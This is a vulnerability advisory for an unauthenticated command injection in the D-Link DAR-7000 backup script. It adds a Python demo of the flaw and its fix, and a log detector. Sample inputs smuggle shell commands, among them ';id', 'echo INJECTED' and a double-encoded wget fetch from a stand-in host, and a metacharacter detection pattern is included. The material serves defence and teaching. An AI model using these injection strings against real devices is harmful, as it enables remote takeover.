PT-2023-9459 · D-Link · D-Link DAR-7000

Shechenran

Published: 2023-09-22 · Updated: 2024-09-23

CVE-2024-9004

CVSS v2.0: 10.0 (Critical)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: D-Link DAR-7000, all versions up to 20240912
Description: A critical vulnerability has been found in the file /view/DBManage/Backup_Server_commit.php. The value of the host argument is placed into an operating-system command without neutralising special elements (shell metacharacters such as ";", "|", "&" or "$(...)"), so a remote attacker who can reach the script can append commands of their own and execute arbitrary commands on the device with the privileges of the web server process. The CVSS vector above records no authentication requirement (Au:N) and complete loss of confidentiality, integrity and availability.
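To make the failure mode concrete, here is an added illustration; it is not code from the advisory, from D-Link, or from the DAR-7000 firmware (the real script is PHP and is not reproduced on the page). It assumes the script builds a shell command string containing the host value; `echo` stands in for whatever command the real Backup_Server_commit.php runs, which the page does not state. The hardened variant validates the host as an IP literal or an RFC 1123 hostname and passes it as a single argv element without a shell, so no metacharacter is ever interpreted.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: 1-63 character labels of letters, digits and hyphens
# (no leading/trailing hyphen), joined by dots, 253 characters overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(host: str) -> str:
    """Build the command the way the advisory describes the bug: the
    attacker-controlled host value is pasted into a command string with no
    neutralisation.  Hypothetical reconstruction; 'echo' stands in for the
    real command, which is not given on the page."""
    return "echo connecting to " + host


def run_vulnerable(host: str) -> str:
    # shell=True hands the whole string to /bin/sh, so ';', '|', '&&',
    # '$(...)' and friends inside host become additional commands.
    result = subprocess.run(vulnerable_command(host), shell=True,
                            capture_output=True, text=True)
    return result.stdout


def validate_host(host: str) -> str:
    """Accept only an IPv4/IPv6 literal or an RFC 1123 hostname; reject
    anything else before it goes anywhere near a command."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def run_hardened(host: str) -> str:
    # The validated value is one argv element and no shell is involved, so
    # even if validation were loosened later no metacharacter is interpreted.
    argv = ["echo", "connecting to", validate_host(host)]
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"      # constructed attacker input
    print(run_vulnerable(payload), end="")     # the second command runs
    try:
        run_hardened(payload)
    except ValueError as err:
        print("rejected:", err)
    print(run_hardened("db-backup.internal"), end="")
```

Note that escaping (quoting the value into the shell string) is the weaker of the two fixes: it must be correct for every shell the device ships, whereas an allow-list plus argv execution removes the shell from the picture entirely.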
Recommendations: The D-Link DAR-7000 (all versions up to 20240912) is no longer supported by the vendor, so no fixed release is known. As a temporary workaround, restrict access to /view/DBManage/Backup_Server_commit.php, for example by blocking the path at a reverse proxy or firewall and by limiting the management interface to trusted networks or a VPN, and avoid supplying the host argument to this script until further guidance is available. Because the issue is unauthenticated and gives full command execution, a device whose management interface is reachable from untrusted networks should be treated as potentially compromised and be replaced rather than merely firewalled.
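As an added detection check (not part of the advisory or of any D-Link tooling), the following scans constructed web-server access log lines for requests to the vulnerable path whose host query parameter contains shell metacharacters, decoding a second time to catch double URL-encoding. It assumes the parameter travels in the query string and that the logs are in Common Log Format; if the device submits the form in a POST body, the body is not logged and a WAF or application log would be needed instead.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path named in the advisory; 'host' is the injected parameter.
TARGET_PATH = "/view/DBManage/Backup_Server_commit.php"

# Characters that change the structure of a shell command line.
SHELL_META = re.compile(r"[;&|`$<>\n]")

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2023:10:15:01 +0000] '
    '"GET /view/DBManage/Backup_Server_commit.php?host=10.0.0.5 HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Sep/2023:10:15:09 +0000] '
    '"GET /view/DBManage/Backup_Server_commit.php?host=10.0.0.5%3Bid HTTP/1.1" 200 740',
    '198.51.100.2 - - [22/Sep/2023:10:16:30 +0000] '
    '"GET /view/DBManage/Backup_Server_commit.php?host=127.0.0.1%2524(wget%2520http%3A%2F%2F198.51.100.2%2Fx) HTTP/1.1" 200 740',
    '192.0.2.9 - - [22/Sep/2023:10:17:00 +0000] '
    '"GET /view/index.php?host=a%3Bb HTTP/1.1" 200 100',
]


def suspicious_host_values(log_lines):
    """Return (client_ip, timestamp, decoded_host) for every request to the
    vulnerable path whose host parameter carries shell metacharacters."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not CLF, skip rather than guess
        url = urlsplit(m["target"])
        if url.path != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("host", []):
            # parse_qs already decoded %xx once; decode again so a
            # double-encoded payload (%253B -> %3B -> ;) is also caught.
            decoded = unquote(value)
            if SHELL_META.search(decoded):
                hits.append((m["ip"], m["ts"], decoded))
    return hits


if __name__ == "__main__":
    for ip, ts, host in suspicious_host_values(SAMPLE_LOG):
        print(f"{ts} {ip} host={host!r}")
```

A benign value such as `10.0.0.5` never contains these characters, so any match on this path is worth an alert; the last sample line shows the same payload against a different script is ignored, which keeps the rule specific to this advisory rather than a generic metacharacter hunt.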

Exploit

Weakness Enumeration

OS Command Injection

Related Identifiers

BDU:2024-07790
CVE-2024-9004

Affected Products

D-Link DAR-7000